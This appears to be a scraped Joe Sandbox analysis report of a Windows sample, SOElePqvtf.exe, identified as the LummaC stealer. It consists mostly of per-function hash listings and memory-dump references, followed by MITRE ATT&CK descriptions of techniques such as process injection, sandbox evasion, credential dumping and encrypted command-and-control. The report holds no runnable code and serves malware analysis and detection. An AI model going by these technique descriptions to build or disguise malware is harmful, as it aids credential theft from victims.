Instruction Fuzzy Hash: 1931F37254D6F24EC736896D48900BDBAA09AA611872F43FEDCF18B7C3C712C94983E1

Function 00402B40 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
Instruction ID: ac5a2fd1a34d00fe81212d9a0dd75a5008a32a6ff7d51fa23ef38769660ba55c
Opcode Fuzzy Hash: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
Instruction Fuzzy Hash: 392129B971A1A10BD700DF399DD412B77A2D7C730671F4577DA80D3392C27AE80AC225

Function 0041B3F2 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92

Function 0211B659 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction ID: cfff9f84711d544a3acd760d042e6530f07c2d6389faa4d1fbed8f9454f20f5c
Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction Fuzzy Hash: 5C31D27665C3418BD718CF39C89136BBBE2AB86218F18CA6DE4D1D72C4D7388505CB52

Function 0213EB27 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aff2747913e61d8e485ec3db636ec536704eedd3d1794fbcb6d77b268cc3f13
Instruction ID: afcae393b63bb5bb17d59ffa0d0c7d77a0a0a1549dde092954f5debaef8a5137
Opcode Fuzzy Hash: 2aff2747913e61d8e485ec3db636ec536704eedd3d1794fbcb6d77b268cc3f13
Instruction Fuzzy Hash: BB217E3984435BCBC7259F18C01067EF3B1FF59B90F56841DD88167225EB74A9A9CBC1

Function 00430F03 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6

Function 0213116A Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0199799e75cbd837ee7f3b361dc18108ad832d3bad261f098223bc718b25986b
Instruction ID: cb412fdb42dbef61a0f51c4949d9aa6c44e1a6c429184d0a7c54f680624261e7
Opcode Fuzzy Hash: 0199799e75cbd837ee7f3b361dc18108ad832d3bad261f098223bc718b25986b
Instruction Fuzzy Hash: 1221B1769583A04BE3358B358C953DBBBE2ABC6314F19862CC8D957284DB760805CBC1

Function 0043A230 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A

Function 0213A497 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: d1d7e99c5b7450ab07fae1242d4dfead33c7b6a84507fc47f8f12d7774bd6a79
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3711C233A491D40EC7178D3C8400575BFA30E93135B5D8399E8F99B2D2C722898A8750

Function 0042C5E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD

Function 0212C847 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
Instruction ID: d70422786504b9d6fcfb224688ca5719e2891ff703b5970fe2d8dd3548a669f4
Opcode Fuzzy Hash: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
Instruction Fuzzy Hash: A30188F1A843114BD7309E5494C0B3FB2B9AF91714F1A803DEA1597640DB76E82DDBD1

Function 00510083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Offset: 00510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: be3daf3474673991140204c618dc4df273eacbdb436e5210180f083519479c10
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: A7115E72340100AFE754DE55DCC5FE677EAFB89320B698065E908CB356D6B5E881C760

Function 02115527 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbd00ec1fbfda298244a4535371ea7b35dd49cf87d54f7bde964ae8a89d22a9
Instruction ID: e481988c3697291b2b9e0ad811788611e600e037b72eba46d25219f1f5f9af05
Opcode Fuzzy Hash: ddbd00ec1fbfda298244a4535371ea7b35dd49cf87d54f7bde964ae8a89d22a9
Instruction Fuzzy Hash: 6701AD74754101ABC7588F299C50A3A73A3FB86319BA52538E045A7460D730E853CE89

Function 00440A90 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
Instruction ID: 7b6863c9c9260bd0558c6f806dd5f9e3415f7290086a878cc0b8c3271b95cfd7
Opcode Fuzzy Hash: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
Instruction Fuzzy Hash: 6EF0F936544304ABE1105B459C40D3777AEFB9E728F104319F715332A1E772ED2197A9

Function 02115202 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
Instruction ID: 174d8d214e91a5b743807ac70521d5779f54885d6c7832398ffe5d4986030e8a
Opcode Fuzzy Hash: 298ad0f31f07e6cbc3fafda3465d78227824978fe87ca002a14543de39e85b0e
Instruction Fuzzy Hash: 56F0243AA4C7508EE3048EE8C48436BFBD3EBC1304F19947DC6C4A7180CAB988818B92

Function 0210275E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
Instruction ID: e1c34f7d4b65843d9a3a8c1689f1dfd7a70c26a6810f8b60c219f319f5d8a5ab
Opcode Fuzzy Hash: e90889bea583965d5caf57eaac281fb9adadddb4774545dd124efcdbcc5e77d5
Instruction Fuzzy Hash: 80F0DC325881104F87180E0988E43B4F3A30ADB208719916ED8D0472C9C7B0D549C71C

Function 0211921E Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
Instruction ID: 63c0c78cf104bb8ab8bf0e1a81b01610297b1db6a5b3153b03c5a93a68e485e2
Opcode Fuzzy Hash: 171e36fd424bda3a0986d43e2945777b52d37d187c2806a166bc1c3e11cd69f4
Instruction Fuzzy Hash: 87F0A0B5A44206EFCF209F44C851AA7BBF5FF8A350F045466F8858B230E771C961DB56

Function 0213EA3F Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
Instruction ID: 414f2ab488299f95e9665e70270145f327ea7b485026fa5bffa9aac6899457ee
Opcode Fuzzy Hash: 53e1be47eb7fcb08e4cbd52fc7e03711af06ea58593d8f6f322e6d4cad867a7e
Instruction Fuzzy Hash: 4DF0A932A193508BC310DF258A0036BF7E2BFC2B04F48C868D4D997210E238C5028756

Function 0041F3E0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D

Function 0211F647 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: e8750800c4d63081399af7d5dedf564907814aa4962b244ea5ee7b04af0651c6
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: EED097605883A00E4708CE3804A0837FBE4E943122B0810AEE0D1E3424C331D802C298

Function 02128EB2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
Instruction ID: ad7c06e57a303dba94bcd7d2aa197efc7e92ac1f9ab750114ca6719ae142e1d8
Opcode Fuzzy Hash: 1cb6986d49f719985d39046bb9c9820c9f7ea8fbe7571d132dc76052a6f0b540
Instruction Fuzzy Hash: 77B048389482409B9604CF00E88042AF375AA8B200F14A418E84933310CA30E8008A89

Function 00425560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D

Strings

$%, xrefs: 004255A6
p:#, xrefs: 00425647
MO, xrefs: 00425572

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $%$p:#$MO
API String ID: 237503144-3521940197
Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86

Function 021257C7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02125884

Strings

$%, xrefs: 0212580D
p:#, xrefs: 021258AE
MO, xrefs: 021257D9

Memory Dump Source

Source File: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2100000_SOElePqvtf.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: $%$p:#$MO
API String ID: 237503144-3521940197
Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction ID: f9d8c31d582de6088f48e323e662a08b9a7e24372a294ff55fb19a036bce0dc2
Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction Fuzzy Hash: 9E41CE365583449BE314CF25C88475FBBE2FBC5758F16892CE4D49B680C7B9CA0A8B82

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SOElePqvtf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SOElePqvtf.exe_58555184b317d2a4a9cf248bcca3ab33162bc60_06847b8e_4a7b8b0a-c7c8-4434-841c-f0e23e7075f3\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5EF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF729.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF759.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
SOElePqvtf.exe

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Function 00408A60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216
